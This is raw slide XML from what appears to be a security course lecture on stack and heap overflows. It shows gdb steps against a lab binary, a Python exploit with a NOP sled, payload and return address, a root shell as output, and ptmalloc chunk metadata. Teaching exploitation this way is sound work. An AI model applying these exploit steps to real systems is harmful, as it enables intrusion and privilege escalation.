              <a:t>decoder.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> decoder.asm</a:t>
            </a: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lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt; ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1"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lang="en-US" sz="2047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47" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>payload.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> 256 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>payload.enc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2047" dirty="0" smtClean="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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 smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt; cat 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decoder.bin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payload.enc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47" dirty="0" smtClean="0"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lang="en-US" sz="2047" dirty="0" smtClean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47" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr sz="2047" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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&gt; 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vuln</a:t>
            </a:r>
            <a:endParaRPr sz="2047" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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) b main</a:t>
            </a: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Breakpoint 1 at 0x4005d4</a:t>
            </a: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) r "$(cat exploit)"</a:t>
            </a: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[repeat below to step to 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 call]</a:t>
            </a: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) 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si</a:t>
            </a:r>
            <a:endParaRPr sz="2047" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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0x400611 in main()</a:t>
            </a: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1: x/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i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 $rip</a:t>
            </a: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=&gt; 0x400611 &lt;main+65&gt;: call 0x4004c0 &lt;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strcpy@plt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) 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si</a:t>
            </a:r>
            <a:endParaRPr sz="2047" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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[use finish to immediately return from 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) fin</a:t>
            </a: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047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) p/x $</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:endParaRPr sz="2047" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="373783">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>$1 = 0x7fffffffe640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814117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Locating the Saved IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 5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) x/2xg $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rbp</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo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	0x7fffffffe750: 0x0000000000000000 0x00007ffff7a54b05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) p/x 0x7fffffffe758 - 0x7fffffffe640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$2 = 0x118</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="321457" indent="-321457" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="844"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="98223" algn="l"/>
                <a:tab pos="321457" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="914" dirty="0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We know that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> + 8 is the address of the saved IP (why?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Computing the difference between the saved </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> and the buffer address gives us the maximum size of our input before we overwrite the saved IP (here, 0x118)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194556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Locating the Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Shape 5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) x/x $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 - 0x10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solidFill>
                  <a:srgbClr val="808080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0x7fffffffe740: 0x00007fffffffe838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solidFill>
                  <a:srgbClr val="808080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) x/2xg 0x00007fffffffe838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solidFill>
                  <a:srgbClr val="808080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0x7fffffffe838: 0x00007fffffffeaca 0x00007fffffffeaff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solidFill>
                  <a:srgbClr val="808080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) x/s 0x00007fffffffeaca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solidFill>
                  <a:srgbClr val="808080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0x7fffffffeaca: ”[...]/stack/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vuln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”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solidFill>
                  <a:srgbClr val="808080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) x/8xb 0x00007fffffffeaff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solidFill>
                  <a:srgbClr val="808080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0x7fffffffeaff: 0x48 0x31 0xc0 0x48 0x89 0xc1 0xb1 0x08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endParaRPr sz="1687" dirty="0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In our build, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> is stored in [rbp-0x10]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Chasing pointers, we find </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>[0] and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>We now know enough to build our final payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104400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Constructing an Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57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2724" y="1496296"/>
            <a:ext cx="5926552" cy="46022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21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NOP Sleds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Shape 5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96902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Our input will consist of a NOP sled, the payload, and the address of the argv copy of our payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="296902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>NOP sleds are used to pad out exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Composed of instruction sequences that don't affect proper execution of the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Classically the NOP instruction (0x90), but not restricted to that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="296902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Why are the called sleds?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137" i="1"/>
              <a:t>slides</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t> down the NOPs into your payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Overwritten return address can be less precise, so long as we land somewhere in the NOP sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428434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Shape 5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Constructing an Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Shape 5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import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b="1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sys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b="1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buf_len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0x118</a:t>
            </a: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ret_addr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0x7fffffffea60</a:t>
            </a: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payload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open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'exploit'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read()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2250" b="1" dirty="0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\x90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buf_len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len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(payload))) \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payload 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pack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'&lt;Q'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ret_addr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sys</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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write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305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Finally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Shape 5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&gt; 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vuln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) r ”$(./exploit.py)”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Starting program: [...]/stack/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vuln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 ”$(./exploit.py)”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????????????????????????????????????????????????????[...]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process 62743 is executing new program: /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usr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/bin/bash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warning: Could not load shared library symbols for linux-vdso.so.1.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Do you need ”set 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solib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-search-path” or ”set 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sysroot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”?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sh-4.2# id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uid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=0(root) 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gid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=0(root) groups=0(root),1(bin),2(daemon),3(sys),[...] </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139175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Smashing the Heap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Heap Data Structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit Construction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365406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766" y="1426029"/>
            <a:ext cx="8736748" cy="1621969"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x86 has gone through 16, 32, and 64 bit versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Registers can be addressed in whole or in part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50037" y="2873823"/>
            <a:ext cx="7217229" cy="8490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RAX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8651" y="3624937"/>
            <a:ext cx="3608615" cy="849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EAX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2957" y="4354276"/>
            <a:ext cx="1804308" cy="8490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AX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8362957" y="5116280"/>
            <a:ext cx="902154" cy="849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AH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9265111" y="5116280"/>
            <a:ext cx="902154" cy="8490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7082" y="3036754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64 bits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5696" y="37878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32 bits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8857" y="4517207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/>
              <a:t>16 bits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5695" y="5279211"/>
            <a:ext cx="299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8 bit high and low</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246346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Heap-based Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Shape 6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The stack isn't the only target for overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>The heap is also a popular exploitation target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Completely different beast than stack-based overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Much more difficult due to (usually) non-deterministic shape of heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Many different types of heap overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We'll examine one prominent example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243308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Heaps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Shape 6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buf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malloc(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1024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...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free(buf);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/>
              <a:t>The heap is used to store dynamically allocated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Managed using the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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and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free</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> family of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Heap managers request memory from the kernel via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*brk</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>,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mmap</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Many different heap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238378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Heaps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="620" name="Table 620"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1884764098"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3130262" y="1788240"/>
          <a:ext cx="5931474" cy="4018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98972"/>
                <a:gridCol w="3432502"/>
              </a:tblGrid>
              <a:tr h="502295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Implementation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Platform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502295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ptmalloc2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Linux, HURD (glibc)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02295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SysV AT&amp;T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IRIX, SunOS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02295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Yorktown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AIX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02295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RtlHeap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Windows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02295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tcmalloc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Google and others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02295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jemalloc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FreeBSD, NetBSD, Mozilla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02295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 err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>phkmalloc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*BSD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87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ptmalloc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Shape 6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Extremely popular malloc (default in glibc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Stores memory management metadata inline with user data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Stored as small chunks before and after user chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>(Where have we seen a scheme like this before?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Aggressive optimizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Maintains lists of free chunks binned by size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Merges consecutive free chunks to avoid fragmentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2654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Heap-based Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Shape 6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First demonstrated by Solar Designer in 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>JPEG COM marker processing vulnerability in Netscape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Proposed a generic way to exploit heap-based overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Idea: Attack the memory manager itself, taking advantage of mixed data and control information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Generic since all programs on a platform usually use the default system allocator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21532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Heap Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Shape 635"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4850579" y="1344057"/>
            <a:ext cx="5147695" cy="49067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The heap is divided into contiguous memory chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Chunks either allocated (in use by user) or free for allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Bordered by the wilderness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Each chunk can be split and combined as needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>No two free chunks can be adjacent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63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5968" y="1431071"/>
            <a:ext cx="1937798" cy="47326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5319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Control Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 6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size_t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prev_size;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size_t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size;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fd;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bk;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844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/>
              <a:t>Each chunk starts with a control block, or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>boundary tag</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Holds chunk management information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>16 or 32 bytes, depending on architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>But, allocated chunks only have half that overhead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116702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Control Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 6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size_t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prev_size;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size_t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size;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fd;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bk;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844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prev_size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>If the previous chunk is free, contains its size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Otherwise, holds user data of the previous chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285020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Control Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 6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size_t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prev_size;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size_t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size;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fd;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bk;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844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size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Equals the requested memory +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sizeof(size)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> rounded up the next multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>3 LSBs are always free and used for status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="902858" lvl="2" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>e.g.,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PREV_INUSE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>,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IS_MMAPPED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70542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Control Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Shape 6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size_t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prev_size;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size_t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size;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fd;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malloc_chunk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bk;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844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fd, bk</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Pointers used to link free chunks into double-linked lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Otherwise, contain user data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
